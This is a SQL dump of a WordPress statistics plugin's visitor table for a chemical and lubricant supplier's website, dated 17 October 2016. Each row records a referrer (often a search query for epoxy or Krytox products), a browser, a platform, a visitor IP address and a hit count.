INSERT INTO `wp_statistics_visitor` VALUES (4850, '2016-10-17', 'https://www.miller-stephenson.com/miller/pdf/brushes.pdf', 'Unknown', 'Unknown', 'Unknown', '', '2.231.46.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4851, '2016-10-17', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4852, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.234.121.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4853, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '99.51.152.114', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4854, '2016-10-17', 'https://globalwits.globalsou.com/crawl/searchResult.asp?id=55922', 'Chrome', 'Windows', '45.0.2454.101', '', '27.223.28.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4855, '2016-10-17', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '174.52.77.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4856, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4857, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.26.127', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4858, '2016-10-17', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjZ9rft5ODPAhVI32MKHQ4uAHYQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&sig2=2E4F-FER0YRyGR6I_9e3iA&bvm=bv.135974163,d.cGc', 'MSIE', 'Windows', '11.0', '', '163.251.239.3', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4859, '2016-10-17', 'https://www.bing.com', 'MSIE', 'Windows', '8.0', '', '208.184.112.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4860, '2016-10-17', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '10.0', '', '93.115.95.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4861, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.33.107.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4862, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '150.70.173.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4863, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4864, '2016-10-17', 'https://www.miller-stephenson.com', 'AppleWebKit', 'iPad', '602.1.50', '', '104.55.119.59', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4865, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.248.197.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4866, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '129.252.33.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4867, '2016-10-17', 'https://www.google.ru/', 'Chrome', 'Windows', '53.0.2785.143', '', '195.208.165.155', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4868, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.140.70.134', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4869, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.28.172.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4870, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.7.39.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4871, '2016-10-17', 'https://www.bing.com/search?q=HELOXY+Modifier+68+Epoxy+Modifier&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4872, '2016-10-17', 'https://www.miller-stephenson.com/product/heloxy-68/', 'MSIE', 'Windows', '9.0', '', '204.79.180.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4873, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '87.118.115.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4874, '2016-10-17', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1211.0LiZ_xi_4BHdwQ3ey6Xe_BRO8hosEmq4Lq0mAWJbma01j4CyNX-FqOTqYLIQn-Xw.3373ed6b057ab4ce9ec2515b24a48b99a796a851&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMIVJNtoWDTa6Ctl47TPu5I&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhUZEJ4Vl9jRFgtVDl1S3Q5emRDX2ZUeVhPQXR3SzI0ODJTM01XZXBSaTZYV3JZME5LdGRHdXQ3c1ZYZkVwRUlhQQ&b64e=2&sign=7d366dcb2b7673642d7c607a47363903&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlOzeni7HQb1x66YCWFUBlV2cluCw5HB_ErUDa9fbC7U2Ca3QHcZ6Dnx-8cE5TCsoVWUaKxYPzrSrCLhqwSLZ-FZ4pTJLMc4oLQr__JW2_GzVA5xYaNGBLrCj6qNDZCRvG&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV-HtQ36UFK03Ued_sHLfIfAvLfHLPF148_SS7b_j8IbZuho9yC_WOHYygOczN9QyPabm3K8U705LyufZBO-VANadgpI_qRPBs&l10n=ru&cts=1476674357341&mc=1.96035521146', 'Chrome', 'Windows', '31.0.1650.63', '', '37.204.63.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4875, '2016-10-17', 'https://www.bing.com/search?q=epoxy+curing+agents+best+uv+resistance&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4876, '2016-10-17', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjd2_D_9ODPAhWHM48KHZIiAUcQFggqMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240az%2F&usg=AFQjCNEwNURE0QzS32SjwIAsgrEmgcDasg&sig2=jtPRkZy5HZDxDyUJZlGR7A&bvm=bv.135974163,d.c2I', 'MSIE', 'Windows', '11.0', '', '10.88.4.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4877, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/', 'MSIE', 'Windows', '9.0', '', '204.79.180.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4878, '2016-10-17', 'https://www.google.com.hk/', 'Chrome', 'Windows', '47.0.2526.108', '', '59.39.212.39', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4879, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjAwa-l9eDPAhVO9GMKHa3rBqoQFghZMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '11.0', '', '130.221.224.7', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4880, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/', 'Firefox', 'Windows', '49.0', '', '66.68.116.245', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4881, '2016-10-17', 'https://www.miller-stephenson.com', 'test', 'Unknown', 'Unknown', '', '54.166.112.101', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4882, '2016-10-17', 'https://www.google.com.sg/', 'Edge', 'Windows', '14.14393', '', '118.200.249.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4883, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '183.15.5.117', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4884, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.169.80.52', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4885, '2016-10-17', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.0.2', '', '71.57.53.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4886, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.52.202.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4887, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.35.43.243', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4888, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.164.238.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4889, '2016-10-17', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.103', '', '199.168.97.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4890, '2016-10-17', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '44.0', '', '199.168.97.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4891, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.252.29.157', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4892, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.202.255.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4893, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.148.49.227', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4894, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.33.235.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4895, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.93.136', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4896, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.33.229.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4897, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.188.92.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4898, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.15.140.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4899, '2016-10-17', 'https://www.bing.com/search?q=EPON+Resin+58034&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4900, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy/epon-elastomer-modified-epoxy-resins/', 'MSIE', 'Windows', '9.0', '', '204.79.180.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4901, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.237.4.37', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4902, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '184.89.53.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4903, '2016-10-17', 'https://www.google.nl/', 'Chrome', 'Windows', '50.0.2661.75', '', '32.42.40.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4904, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.208.67.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4905, '2016-10-17', 'https://www.miller-stephenson.com/epoxy-and-coatings/', 'MSIE', 'Windows', '9.0', '', '182.118.20.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4906, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.198.205.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4907, '2016-10-17', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '176.40.154.225', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4908, '2016-10-17', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwj-07eajeHPAhVJzlQKHeOsBoAQFghPMAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-67%2F&usg=AFQjCNFxL21oM9HslAfbWmySnnKUMSYH5A&bvm=bv.135974163,d.c2I', 'MSIE', 'Windows', '11.0', '', '218.158.86.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4909, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4910, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4911, '2016-10-17', 'https://www.miller-stephenson.com/category/miller-stephenson-articles/', 'MSIE', 'Windows', '9.0', '', '182.118.21.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4912, '2016-10-17', 'https://ttsgco.anisablog.ir/', 'Chrome', 'Windows', '53.0.2785.143', '', '183.136.148.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4913, '2016-10-17', 'https://ttsgco.anisablog.ir/', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.33.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4914, '2016-10-17', 'https://www.farschemical.com/', 'MSIE', 'Windows', '9.0', '', '151.243.205.59', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4915, '2016-10-17', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '123.63.252.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4916, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '125.160.83.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4917, '2016-10-17', 'https://www.google.co.kr/', 'Chrome', 'Windows', '53.0.2785.143', '', '211.59.68.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4918, '2016-10-17', 'https://www.google.co.kr/url?url=https://www.miller-stephenson.com/product/krytox-240ab/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiwr_DalOHPAhULwlQKHZY0AZMQFggYMAE&usg=AFQjCNGtX0OsHbD5oQFzIH-dx3vj2db86w', 'MSIE', 'Windows', '8.0', '', '218.234.214.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4919, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.71.225.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4920, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '145.255.3.96', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4921, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.186.204.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4922, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '166.62.118.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4923, '2016-10-17', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '43.0', '', '199.168.97.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4924, '2016-10-17', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.97', '', '199.168.97.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4925, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '207.46.13.165', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4926, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2062.124', '', '54.225.27.154', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4927, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '195.238.74.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4928, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '180.111.84.128', '000', 43, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4929, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '86.34.48.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4930, '2016-10-17', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '212.154.95.102', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4931, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.68.68.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4932, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.194.101.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4933, '2016-10-17', 'https://www.miller-stephenson.com', 'Python-urllib', 'Unknown', '2.7', '', '213.61.213.158', '000', 35, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4934, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '69.163.163.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4935, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.235.36.94', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4936, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.167.183.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4937, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '81.169.144.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4938, '2016-10-17', 'https://www.google.com.sg/', 'Firefox', 'Windows', '49.0', '', '203.127.44.13', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4939, '2016-10-17', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '182.77.82.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4940, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '184.83.7.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4941, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '213.251.182.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4942, '2016-10-17', 'https://www.google.co.in/', 'Firefox', 'Windows', '49.0', '', '121.243.44.34', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4943, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.181.182.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4944, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.235.65.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4945, '2016-10-17', 'https://www.miller-stephenson.com/krytox-automotive-bearing-lubrication/', 'MSIE', 'Windows', '9.0', '', '204.79.180.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4946, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.187.219.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4947, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.62.133.63', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4948, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.207.78.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4949, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '78.46.152.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4950, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.76.26.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4951, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.83', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4952, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '62.219.78.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4953, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.182.133.243', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4954, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.122.70.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4955, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.237.187.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4956, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.186.85.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4957, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.84.208.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4958, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.228.250.157', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4959, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '45.51.180.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4960, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.125.90.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4961, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.11.30.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4962, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.124.138.219', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4963, '2016-10-17', 'https://www.miller-stephenson.com/product/epon-8280/', 'Firefox', 'Windows', '45.0', '', '134.94.80.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4964, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '31.0', '', '54.229.30.6', '000', 96, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4965, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '180.240.200.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4966, '2016-10-17', 'https://search.naver.com/search.naver?sm=tab_hty.top&where=nexearch&oquery=%ED%85%8C%ED%94%84%EB%A1%A0%EC%BD%94%ED%8C%85&ie=utf8&query=miller+stephenson&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&ucs=gXt%2B6SzIHbvS', 'MSIE', 'Windows', '11.0', '', '210.108.64.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4967, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.232.56.47', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4968, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.244.132.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4969, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4970, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4971, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.83.237.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4972, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '112.239.82.202', '000', 65, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4973, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.227.105.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4974, '2016-10-17', 'https://www.google.ru/', 'Chrome', 'Windows', '53.0.2785.143', '', '91.234.60.147', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4975, '2016-10-17', 'https://www.google.nl/', 'Chrome', 'Windows', '53.0.2785.143', '', '195.35.222.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4976, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.36.220.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4977, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.34.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4978, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.109.145.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4979, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.193.64.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4980, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.51.192.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4981, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '61.52.63.165', '000', 43, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4982, '2016-10-17', 'https://www.google.com.tr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwix9aehueHPAhWnYZoKHS32CqAQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.bGs', 'MSIE', 'Windows', '11.0', '', '165.156.26.36', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4983, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.213.197.188', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4984, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.113.125.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4985, '2016-10-17', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'MSIE', 'Windows', '11.0', '', '165.156.26.37', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4986, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.222.71.53', '000', 2, 0); 
